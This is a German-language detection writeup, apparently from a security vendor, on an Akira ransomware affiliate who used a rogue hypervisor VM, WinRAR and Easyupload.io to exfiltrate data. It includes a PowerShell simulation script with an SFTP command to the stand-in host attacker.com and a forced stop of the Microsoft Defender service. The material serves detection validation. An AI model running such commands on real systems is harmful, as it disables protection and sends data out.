Akira, LimeWire und der bittere Nachgeschmack von Datenexfiltration
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Ein Akira-Ransomware-Affiliate erlangte unbefugten Zugriff auf einen Hypervisor und erstellte eine neue virtuelle Maschine, um diese als verdeckte Zwischenstelle zu nutzen. Der Angreifer verließ sich auf diese isolierte VM, um der Sicherheitsüberwachung zu entgehen, Daten mit WinRAR vorzubereiten und Archive über die Easyupload.io Datei-Sharing-Plattform zu exfiltrieren. Der Fall zeigt, wie Bedrohungsakteure weiterhin legale Upload-Dienste für Datendiebstahl missbrauchen.
Untersuchung
Die Untersuchung kombinierte EDR-Telemetriedaten, Windows-Ereignisprotokolle und den Browserverlauf von Microsoft Edge, um den Einbruch zu rekonstruieren. Analysten stellten zudem ein VHDX-Abbild der betrügerischen virtuellen Maschine wieder her, das aufzeigte, wie der Angreifer Microsoft Defender deaktivierte und den Akira-Ransomware-Betrieb einrichtete. Die forensische Überprüfung der VM enthüllte die genauen Werkzeuge, Websites und Arbeitsabläufe, die während der Staging- und Exfiltrationsphasen verwendet wurden.
Minderung
Organisationen sollten auf das Auftreten neuer oder unautorisierter Endpunkte und virtueller Maschineninstanzen in ihrer Umgebung achten. Starke Sichtbarkeit bei Remote-Zugriffen auf kritische Systeme wie Hypervisoren und Domain-Controller ist essentiell. Es ist auch wichtig, den Zugang zu bekannten Datei-Sharing- und Schnell-Upload-Diensten, die für Exfiltration genutzt werden können, einzuschränken oder genau zu überwachen.
Reaktion
Wenn ein unautorisierter Zugriff auf den Hypervisor festgestellt wird, isolieren Sie sofort den betroffenen Hypervisor und alle neu erstellten virtuellen Maschinen. Führen Sie eine forensische Analyse der VM-Abbilder durch, um das Ausmaß der Datenbereitstellung und -exfiltration zu bestimmen. Überprüfen Sie Zugriffprotokolle, um den ursprünglichen Einstiegspunkt nachzuverfolgen und zu bestätigen, dass kein dauerhafter Angreiferzugriff besteht.
Angriffsablauf
Erkennungen
LOLBAS Finger (über cmdline)
Ansehen
Mögliche Dateninfiltration/Exfiltration/C2 über Drittdienste/Werkzeuge (über cmdline)
Ansehen
Mögliche Dateninfiltration/Exfiltration/C2 über Drittdienste/Werkzeuge (über Proxy)
Ansehen
Mögliche Dateninfiltration/Exfiltration/C2 über Drittdienste/Werkzeuge (über DNS)
Ansehen
Akira-Ransomware-Angriff durch neue virtuelle Maschine und Datenexfiltration [Windows-Prozesserstellung]
Ansehen
Simulationsausführung
Voraussetzung: Der Telemetrie- und Basislinien-Vorab-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angriffs-Erzählung & Befehle: Der Gegner hat initialen Zugriff erlangt und möchte den Einfluss eskalieren. Zuerst listen sie sensible Dateien auf, indem sie nach bekannten Textdateien wie
AdUsers.txtsuchen. Zur Vorbereitung der Exfiltration verwenden sieWinRAR.exeum die Daten zu komprimieren. Dann bereiten sie ihr Exfiltrationstool vor,WinSCP.exeund führen schließlich dieakira.exeRansomware-Nutzlast aus. Um zu verhindern, dass der EDR/Antivirus den Prozess beendet, versuchen sie denWindefendDienst zu stoppen. Diese spezifische Abfolge von Befehlszeilenargumenten und Dienststatusänderungen soll die Akira-spezifische Erkennungslogik auslösen. -
Regressionstest-Skript:
# Simulationsskript zur Validierung der Akira-Ransomware-Erkennung # HINWEIS: Dieses Skript erfordert Administratorrechte, um den Defender-Dienst zu stoppen. Write-Host "[+] Start der Akira-Ransomware-Simulation..." -ForegroundColor Cyan # 1. Ermitteln/Enumerieren simulieren (T1119) Write-Host "[+] Schritt 1: Datei-Auflistung über Notepad simulieren..." Start-Process notepad.exe -ArgumentList "AdUsers.txt" Start-Sleep -Seconds 2 # 2. Datenarchivierung simulieren (T1560.003) # Hinweis: Wir gehen davon aus, dass WinRAR vorhanden ist oder wir die Befehlszeilenaktivität simulieren Write-Host "[+] Schritt 2: Datenarchivierung mit WinRAR simulieren..." Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt" Start-Sleep -Seconds 2 # 3. Exfiltrationstool-Vorbereitung simulieren (T1105) Write-Host "[+] Schritt 3: Exfiltrationstool-Ausführung simulieren..." Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com" Start-Sleep -Seconds 2 # 4. Ransomware-Ausführung simulieren (T1204.002) Write-Host "[+] Schritt 4: Akira-Nutzlast-Ausführung simulieren..." Start-Process "akira.exe" Start-Sleep -Seconds 2 # 5. Defender-Deaktivierung simulieren (T1564.006) # Dies löst EventID 7036 im Systemprotokoll aus. Write-Host "[+] Schritt 5: Versuch, Microsoft Defender zu stoppen..." Stop-Service -Name "Windefend" -Force Write-Host "[+] Simulation abgeschlossen. Überprüfen Sie SIEM auf Warnungen." -ForegroundColor Green -
Bereinigungskommandos:
# Bereinigungsskript Write-Host "[+] Bereinigung der Simulationsartefakte..." -ForegroundColor Cyan # Neustart des Defender-Dienstes Start-Service -Name "Windefend" # Entfernen Sie simulierte Dateien Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue Write-Host "[+] Bereinigung abgeschlossen." -ForegroundColor Green